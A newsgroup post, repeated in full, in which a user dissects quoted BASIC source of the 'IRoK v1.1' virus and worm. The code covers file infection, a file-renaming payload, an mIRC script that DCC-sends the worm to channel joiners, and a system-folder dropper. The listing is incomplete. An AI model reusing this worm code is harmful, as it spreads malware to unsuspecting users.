R
RayLopez99
The poster that goes by "Dustin" in this group posted the below. Don't know where he got it, probably cut and paste from somewhere, but I'd thought it could be a good exercise to go through it, line by line, and figure out what it does. I would appreciate any comments, and I would cross-post this but Google Groups no longer supports that feature.
RL
(My comments in lines having REM in CAPS)
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write
REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
REM - what do the lines above do? Perhaps file_handle > 4 goes to long file names? what address is "&hex4000"? why set bx,cx to these values, and what about na? Is this a 'null' or 'zero' for remaining registers?
read_file:
rem as the name implies, it reads bytes into a buffer.
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad!
rem cx register is how many bytes to read
REM the above comments makes no sense, not to mention the stupid smileys are annoying. But I don't see where the dx register was set to zero as he claims.
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
REM same as before, why? Why is file_handle not < 4? why this cutoff? Perhaps very long file names are not supported by this program?
actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=0
attr=6
kewl=0
virii=7
REM What are these parameters 'errcode' 'attr' why set to 6? etc
CALL SUB "FindFirstF" proc$ Attr ErrCode
REM what is proc$ ? what is this line for?
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
if sleepy=0 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
else
errcode=1
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND
REM seems I understand what is going on at a conceptual level but without the SUB functions not 100% clear. Need the gosub 'lets_infect'
return
rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then
REM what is the above line doing?
rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif
if min$="17" then
rem We're fixing to hose this dudes drive. Well, not really.
REM typical stupid self-aggrandizing comment. Imagine--this guy is writingthis for a future audience. Ironically, now that he has an audience (if in fact our Dustin is the real author) he will not or cannot explain his code. Wow, that speaks volumes. Either incompetence / fakery, excessive misplaced paranoia about the law and how it operates (and he's already in deep water, for reasons he does not even understand), or just playing drama games for his clueless kiddie script non-programmer followers
rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any ****ing joint, any ****in Day."
print""
print"**** all these gun toting hip gangster wannabes. **** your"
print"tattoes, **** all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you."
gosub keypress:
if min$="21" then
print"ž IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif
REM what is the above? Perhaps to display something in stdout, the console? Is this a console mode MS-DOS virus?
rem End of payload jumpsystem!
mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.
REM need subs--that's where the action is...Dustin did not provide. Scared again it seems.
tempfile$=filename$
filename$=script$
gosub set_attr:
filename$=tempfile$
rem drop script
open"o",2,script$
sensitivemsg=1
msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
gosub dump_msg:
msg$="n2= /dcc send $nick "
msg$=msg$+filename$
msg$=msg$+"|"
gosub dump_msg:
msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned byIRoK
v1.1|"
gosub dump_msg:
close 2
return
vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if
we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=1
endif
close 2
if vbsdrop=1 then
tempname$=filename$
filename$="c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=tempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=1 to 8095
print #2,x
next x
close 2
endif
return
whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return
raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=0
gosub set_attr:
gosub create_file:
tempsize=virus_size
tempsize=tempsize+1
bytesize=tempsize
dx=varptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return
rem ***--> End of Payload section.
It's missing stuff. See the above and comment.
RL
PS--I challenge Dustin to show his 'mastery' of assembly by simply posting here a simple subroutine in assembly that will display "FSCK YOU" on the screen if a user runs the program. Simple enough, but if Dustin is a cut-and-paste kiddie scripter as I suspect he is, he won't find this on the net and will fail this simple test.
RL
(My comments in lines having REM in CAPS)
write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write
REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL
if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return
REM - what do the lines above do? Perhaps file_handle > 4 goes to long file names? what address is "&hex4000"? why set bx,cx to these values, and what about na? Is this a 'null' or 'zero' for remaining registers?
read_file:
rem as the name implies, it reads bytes into a buffer.
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad!
rem cx register is how many bytes to read
REM the above comments makes no sense, not to mention the stupid smileys are annoying. But I don't see where the dx register was set to zero as he claims.
if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return
REM same as before, why? Why is file_handle not < 4? why this cutoff? Perhaps very long file names are not supported by this program?
actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=0
attr=6
kewl=0
virii=7
REM What are these parameters 'errcode' 'attr' why set to 6? etc
CALL SUB "FindFirstF" proc$ Attr ErrCode
REM what is proc$ ? what is this line for?
WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
if sleepy=0 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
else
errcode=1
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND
REM seems I understand what is going on at a conceptual level but without the SUB functions not 100% clear. Need the gosub 'lets_infect'
return
rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then
REM what is the above line doing?
rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif
if min$="17" then
rem We're fixing to hose this dudes drive. Well, not really.
REM typical stupid self-aggrandizing comment. Imagine--this guy is writingthis for a future audience. Ironically, now that he has an audience (if in fact our Dustin is the real author) he will not or cannot explain his code. Wow, that speaks volumes. Either incompetence / fakery, excessive misplaced paranoia about the law and how it operates (and he's already in deep water, for reasons he does not even understand), or just playing drama games for his clueless kiddie script non-programmer followers
rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any ****ing joint, any ****in Day."
print""
print"**** all these gun toting hip gangster wannabes. **** your"
print"tattoes, **** all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you.
"gosub keypress:
if min$="21" then
print"ž IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif
REM what is the above? Perhaps to display something in stdout, the console? Is this a console mode MS-DOS virus?
rem End of payload jumpsystem!
mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.
REM need subs--that's where the action is...Dustin did not provide. Scared again it seems.
tempfile$=filename$
filename$=script$
gosub set_attr:
filename$=tempfile$
rem drop script
open"o",2,script$
sensitivemsg=1
msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
gosub dump_msg:
msg$="n2= /dcc send $nick "
msg$=msg$+filename$
msg$=msg$+"|"
gosub dump_msg:
msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned byIRoK
v1.1|"
gosub dump_msg:
close 2
return
vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if
we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=1
endif
close 2
if vbsdrop=1 then
tempname$=filename$
filename$="c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=tempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=1 to 8095
print #2,x
next x
close 2
endif
return
whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return
raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=0
gosub set_attr:
gosub create_file:
tempsize=virus_size
tempsize=tempsize+1
bytesize=tempsize
dx=varptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return
rem ***--> End of Payload section.
It's missing stuff. See the above and comment.
RL
PS--I challenge Dustin to show his 'mastery' of assembly by simply posting here a simple subroutine in assembly that will display "FSCK YOU" on the screen if a user runs the program. Simple enough, but if Dustin is a cut-and-paste kiddie scripter as I suspect he is, he won't find this on the net and will fail this simple test.